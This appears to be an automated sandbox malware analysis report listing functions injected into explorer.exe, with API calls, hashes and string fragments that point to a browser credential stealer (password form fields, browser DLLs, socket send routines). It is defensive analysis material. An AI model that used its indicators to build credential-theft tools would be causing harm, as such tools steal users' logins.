                                            • Snapshot File: hcaresult_6_2_10f50000_explorer.jbxd
                                            Similarity
                                            • API ID: MemoryProtectVirtual
                                            • String ID:
                                            • API String ID: 2706961497-0
                                            • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                            • Instruction ID: ea47baa438b1b57407bead9947e074c7725213be38e463fe8136e9f06b1b04ca
                                            • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                            • Instruction Fuzzy Hash: 5001A234628B884B8748EB2C94422A6B3E5FBCE314F000B3EE99AC3240DB25D5028782
                                            Function 10F9A8C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            • ObtainUserAgentString.URLMON ref: 10F9A9A0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4585321350.0000000010F50000.00000040.80000000.00040000.00000000.sdmp, Offset: 10F50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_10f50000_explorer.jbxd
                                            Similarity
                                            • API ID: AgentObtainStringUser
                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                            • API String ID: 2681117516-319646191
                                            • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                            • Instruction ID: 71de95a62e39826d9afcbfb7326bd2c7cd52789718c0616244f096a7c6bcb633
                                            • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                            • Instruction Fuzzy Hash: AD31DF31A14A4C8FCB44EFA8C8867EEB7E4FB58215F41422AE44ED7240DE789649C799
                                            Function 10F9A8BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            • ObtainUserAgentString.URLMON ref: 10F9A9A0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4585321350.0000000010F50000.00000040.80000000.00040000.00000000.sdmp, Offset: 10F50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_10f50000_explorer.jbxd
                                            Similarity
                                            • API ID: AgentObtainStringUser
                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                            • API String ID: 2681117516-319646191
                                            • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                            • Instruction ID: c1b3cda31f2f5d6bce79638b218569b195e6f3eab87d0c72d4105a6bcf775f26
                                            • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                            • Instruction Fuzzy Hash: D821C331A10A4C8ECB04EFA8C8467EDBBA4FF58245F41422AF45AD7240DF789649C795
                                            Function 10F96B66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148synchronizationCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4585321350.0000000010F50000.00000040.80000000.00040000.00000000.sdmp, Offset: 10F50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_10f50000_explorer.jbxd
                                            Similarity
                                            • API ID: CreateMutex
                                            • String ID: .dll$el32$kern
                                            • API String ID: 1964310414-1222553051
                                            • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                            • Instruction ID: 4aef27d827e1e2d50943e531b6c7eabe2fe5061ac722fd0d9b26c0fa6e3e2e7c
                                            • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                            • Instruction Fuzzy Hash: 81416D74918A08CFDB84EFA8C8967AD77E0FB58301F01417AE84EDB255DE349945CB85
                                            Function 10F96B72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138synchronizationCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4585321350.0000000010F50000.00000040.80000000.00040000.00000000.sdmp, Offset: 10F50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_10f50000_explorer.jbxd
                                            Similarity
                                            • API ID: CreateMutex
                                            • String ID: .dll$el32$kern
                                            • API String ID: 1964310414-1222553051
                                            • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                            • Instruction ID: 28b76fcc83c80c2b11e35a963424cc9f151f6ca18114501d5f34bfcb9e840a13
                                            • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                            • Instruction Fuzzy Hash: 53415A74918A088FDB84EFA8C89A7AD77E0FB68301F01416AE84EDB255DE349945CB85
                                            Function 10F9C72E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52networkCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 289 10f9c72e-10f9c768 290 10f9c788-10f9c7ab connect 289->290 291 10f9c76a-10f9c782 call 10f9f942 289->291 291->290
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4585321350.0000000010F50000.00000040.80000000.00040000.00000000.sdmp, Offset: 10F50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_10f50000_explorer.jbxd
                                            Similarity
                                            • API ID: connect
                                            • String ID: conn$ect
                                            • API String ID: 1959786783-716201944
                                            • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                            • Instruction ID: 1da7adbefee83b90bb503ed0a1c24a76c3c3c824f086a66e2f0267ff5202cf10
                                            • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                            • Instruction Fuzzy Hash: 04014C30618B188FCB84EF5CE089B55B7E0EB58324F1545AAA90DCB226C674D8818BC2
                                            Function 10F9C732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 294 10f9c732-10f9c768 295 10f9c788-10f9c7ab connect 294->295 296 10f9c76a-10f9c782 call 10f9f942 294->296 296->295
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4585321350.0000000010F50000.00000040.80000000.00040000.00000000.sdmp, Offset: 10F50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_10f50000_explorer.jbxd
                                            Similarity
                                            • API ID: connect
                                            • String ID: conn$ect
                                            • API String ID: 1959786783-716201944
                                            • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                            • Instruction ID: 657e560fbff9c9341bcac00509c85a70fcbfb0792efa165187e536d7ad176b23
                                            • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                            • Instruction Fuzzy Hash: 72012170618A1C8FCB84EF5CE489B5577E0FB59314F1541AEA90DCB226C774C9818BC2
                                            Function 10F9C6B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53networkCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 407 10f9c6b2-10f9c6e5 408 10f9c705-10f9c72d send 407->408 409 10f9c6e7-10f9c6ff call 10f9f942 407->409 409->408
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4585321350.0000000010F50000.00000040.80000000.00040000.00000000.sdmp, Offset: 10F50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_10f50000_explorer.jbxd
                                            Similarity
                                            • API ID: send
                                            • String ID: send
                                            • API String ID: 2809346765-2809346765
                                            • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                            • Instruction ID: 2d0120e6a42f2542dfd6868ec01caeb9c4482e1a6b33e71275beb4e33bec668a
                                            • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                            • Instruction Fuzzy Hash: 84012570518A1C8FDBC4DF5CD449B1577E0FB58314F1645AEE85DCB266C670D881CB85
                                            Function 10F9C5B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49networkCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 412 10f9c5b2-10f9c5ea 413 10f9c60a-10f9c62b socket 412->413 414 10f9c5ec-10f9c604 call 10f9f942 412->414 414->413
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4585321350.0000000010F50000.00000040.80000000.00040000.00000000.sdmp, Offset: 10F50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_10f50000_explorer.jbxd
                                            Similarity
                                            • API ID: socket
                                            • String ID: sock
                                            • API String ID: 98920635-2415254727
                                            • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                            • Instruction ID: 4f2a6262c926bbdc3eaab9e000f5f6ab7d6974ce53e99b727364aef5da9c90fb
                                            • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                            • Instruction Fuzzy Hash: A501843061861C8FC784DF1CD049B50BBE0FB59314F1545ADE40ECB226C7B0C981CB82
                                            Function 10F942DD Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 417 10f942dd-10f94320 call 10f9f942 420 10f943fa-10f9440e 417->420 421 10f94326 417->421 422 10f94328-10f94339 SleepEx 421->422 422->422 423 10f9433b-10f94341 422->423 424 10f9434b-10f94352 423->424 425 10f94343-10f94349 423->425 427 10f94370-10f94376 424->427 428 10f94354-10f9435a 424->428 425->424 426 10f9435c-10f9436a call 10f9ef12 425->426 426->427 430 10f94378-10f9437e 427->430 431 10f943b7-10f943bd 427->431 428->426 428->427 430->431 435 10f94380-10f9438a 430->435 432 10f943bf-10f943cf call 10f94e72 431->432 433 10f943d4-10f943db 431->433 432->433 433->422 438 10f943e1-10f943f5 call 10f940f2 433->438 435->431 436 10f9438c-10f943b1 call 10f95432 435->436 436->431 438->422
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4585321350.0000000010F50000.00000040.80000000.00040000.00000000.sdmp, Offset: 10F50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_10f50000_explorer.jbxd
                                            Similarity
                                            • API ID: Sleep
                                            • String ID:
                                            • API String ID: 3472027048-0
                                            • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                            • Instruction ID: 30d3244ed2e22dc4b516d11ffd750f6610764aba9ea728a9ebe1b74052fec55a
                                            • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                            • Instruction Fuzzy Hash: D0319C74604B49DFEB94EF29808ABA5B3A0FB64311F44427FE96DCB106CB34A450DFA1
                                            Function 10F94412 Relevance: 1.5, APIs: 1, Instructions: 46threadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 453 10f94412-10f94446 call 10f9f942 456 10f94448-10f94472 call 10fa1c9e CreateThread 453->456 457 10f94473-10f9447d 453->457
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4585321350.0000000010F50000.00000040.80000000.00040000.00000000.sdmp, Offset: 10F50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_10f50000_explorer.jbxd
                                            Similarity
                                            • API ID: CreateThread
                                            • String ID:
                                            • API String ID: 2422867632-0
                                            • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                            • Instruction ID: 8b384e17e33d55d7df16a799243e34f74644db05a13bdca7d35c9f4d87c3e0a2
                                            • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                            • Instruction Fuzzy Hash: A3F0F634268A484FE788EF2CD84663AF3D0FBE8214F41063EA94DC3264DE39D5828716

                                            Non-executed Functions

                                            Function 0E2DAD02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4584164490.000000000E220000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E220000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_e220000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                            • API String ID: 0-393284711
                                            • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                            • Instruction ID: 89d474c5fcf02d2baaf93ea31f97f3f4f18e570dae7b240ecf71dc85263a4dd9
                                            • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                            • Instruction Fuzzy Hash: BBE17B74628F588FC764EF68C4947AAB7E0FB58301F904A2E959FC7245DF30A905CB89
                                            Function 104CBD02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4584865812.0000000010430000.00000040.80000000.00040000.00000000.sdmp, Offset: 10430000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_10430000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                            • API String ID: 0-393284711
                                            • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                            • Instruction ID: 3b766c56b939e349535b0fc820fd41f62a26cc8c4515c3c390efbeb3fa6ebd07
                                            • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                            • Instruction Fuzzy Hash: F6E179B4618B488FC7A5DF68C4947ABB7E1FB68304F404A2EA59FC7245DF34A501CB89
                                            Function 0E2DD792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4584164490.000000000E220000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E220000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_e220000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                            • API String ID: 0-2916316912
                                            • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                            • Instruction ID: dcb4dc1f0cf709e769fe043d765c56192de2129d3b89fb1f1591e996fbc11d08
                                            • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                            • Instruction Fuzzy Hash: 10B17A30528B488FDB55EF68C485AEEB7F1FF98300F90491ED49AC7251EF7098098B86
                                            Function 104CE792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4584865812.0000000010430000.00000040.80000000.00040000.00000000.sdmp, Offset: 10430000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_10430000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                            • API String ID: 0-2916316912
                                            • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                            • Instruction ID: 1f350fb58dcd68533d3a9666fc6b876a70ceb991a112175fbbc1743ebdf35dfc
                                            • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                            • Instruction Fuzzy Hash: DCB1AD34618B488ECB55EF68C49AAEEB7F1FF98304F40451EE49AC7251EF34A4058B86
                                            Function 0E2DB622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4584164490.000000000E220000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E220000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_e220000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                            • API String ID: 0-1539916866
                                            • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                            • Instruction ID: 66d84a5c63ae4010ed564a487e82ef24f95b185260605453536f7278e95cab53
                                            • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                            • Instruction Fuzzy Hash: EB41B070B2CB08CFDB14DF88A8556AD7BE2FB48700F00025ED509D3245DBB59D498BD6
                                            Function 104CC622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4584865812.0000000010430000.00000040.80000000.00040000.00000000.sdmp, Offset: 10430000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_10430000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                            • API String ID: 0-1539916866
                                            • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                            • Instruction ID: a712731a59292873c1f385c8089bb30593282d4cce274186fc6be932aa416463
                                            • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                            • Instruction Fuzzy Hash: 7F41B070A18B0C8FDB14DF88A4867AD7BE2FB48704F00425EE809D3345DBB5AD458BDA
                                            Function 0E2E2AB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4584164490.000000000E220000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E220000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_e220000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                            • API String ID: 0-355182820
                                            • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                            • Instruction ID: e4c16db5b1168929ba827c8af7aca93fe130b00b08ca1e6c945267e31f19f625
                                            • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                            • Instruction Fuzzy Hash: 25C18C75228B198FC758EF24C495AEAF3E5FB94304F804B2E959EC7250DF30A915CB86
                                            Function 104D3AB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4584865812.0000000010430000.00000040.80000000.00040000.00000000.sdmp, Offset: 10430000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_10430000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                            • API String ID: 0-355182820
                                            • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                            • Instruction ID: a661e2c6453a7b819320eabc1c9623f697fe26b0881c2799b19960a1d3f10673
                                            • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                            • Instruction Fuzzy Hash: D1C15A74218B089BC758EF64C4E6ADAF3E1FBA8304F40462EA59EC7250DF34B515CB86
                                            Function 0E2E2F12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4584164490.000000000E220000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E220000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_e220000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                            • API String ID: 0-97273177
                                            • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                            • Instruction ID: 326f501ca9300f8ec5c1369652efe8b89a1332e3d0f4c7754e4271e637d192d4
                                            • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                            • Instruction Fuzzy Hash: A651C5355287488FD719DF18D8812AAB7E5FBC5700F90192EE8CBC7251DBB49906CB82
                                            Function 104D3F12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4584865812.0000000010430000.00000040.80000000.00040000.00000000.sdmp, Offset: 10430000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_10430000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                            • API String ID: 0-97273177
                                            • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                            • Instruction ID: 5e4a8d47f755690699a6c7a81f2d14eafbccf7d49fc57ae1e6926964ad9e6356
                                            • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                            • Instruction Fuzzy Hash: 5751C2305187488FD709CF18C4D52EAB7E5FBD5704F505A2EE9CB87341DBB8A9468B82
                                            Function 0E2DC2F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4584164490.000000000E220000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E220000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_e220000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                            • API String ID: 0-639201278
                                            • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                            • Instruction ID: a349f7959b040598f98ede894568b57cbafb361ec9765abdb1b74ee4ead495ae
                                            • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                            • Instruction Fuzzy Hash: BEC1AD74628A294FC758EF68D495AAAF3E1FB98304F80472D854EC7255DF30AE06CBC5
                                            Function 0E2DC2F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4584164490.000000000E220000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E220000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_e220000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                            • API String ID: 0-639201278
                                            • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                            • Instruction ID: 86e79da8dfe45c389d67f9b5f02bbd70ecae3115a9b8a59aaea7185b148fbe16
                                            • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                            • Instruction Fuzzy Hash: 40C1AD74628A294FC758EF68C495AAAF3E1FB98304F80472D854EC7251DF30AE06CB85
                                            Function 104CD2F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4584865812.0000000010430000.00000040.80000000.00040000.00000000.sdmp, Offset: 10430000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_10430000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                            • API String ID: 0-639201278
                                            • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                            • Instruction ID: ac9030d84e7dc41db026d987ef2d592771f9cf2762b270c91b9daaec4cbf94ad
                                            • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                            • Instruction Fuzzy Hash: 17C17F74628B194FC748EF68D4A6AAAB3E1FBA8304F41436D944EC7354DF34E902CB85
                                            Function 104CD2F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4584865812.0000000010430000.00000040.80000000.00040000.00000000.sdmp, Offset: 10430000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_10430000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                            • API String ID: 0-639201278
                                            • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                            • Instruction ID: 72460a1200ab66da9c2b0cdd59aee4598958514f95cc79b1b99d30857f8ea876
                                            • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                            • Instruction Fuzzy Hash: 1DC17F74618B194FC748EF68D4A6AAAB3E1FBA8304F51436D944EC7354DF34E902CB85
                                            Function 0E2DDCD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4584164490.000000000E220000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E220000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_e220000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: UR$2$L: $Pass$User$name$word
                                            • API String ID: 0-2058692283
                                            • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                            • Instruction ID: 7fbed4d8b09acc1389b25fa729d657f4b0dc402b384c266810b7302a20c621cb
                                            • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                            • Instruction Fuzzy Hash: FBA19070628B588FDB19EF68D4447EEB7E1FF88304F40462DE48AD7251EB709945C785
                                            Function 104CECD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4584865812.0000000010430000.00000040.80000000.00040000.00000000.sdmp, Offset: 10430000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_10430000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: UR$2$L: $Pass$User$name$word
                                            • API String ID: 0-2058692283
                                            • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                            • Instruction ID: a6efded5875e5a98455799ba431753e1c61d1269025479a750c82ab573207d53
                                            • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                            • Instruction Fuzzy Hash: EFA1D1746187488FDB29DFA8D4847EEB7E1FF98304F40462DE48AD7242EF3895458789
                                            Function 0E2DDCE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4584164490.000000000E220000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E220000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_e220000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: UR$2$L: $Pass$User$name$word
                                            • API String ID: 0-2058692283
                                            • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                            • Instruction ID: 2e0b9001cc29e4172d488c73e8ddf02272558dbc04026a7d3dd13b865cb2e6c1
                                            • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
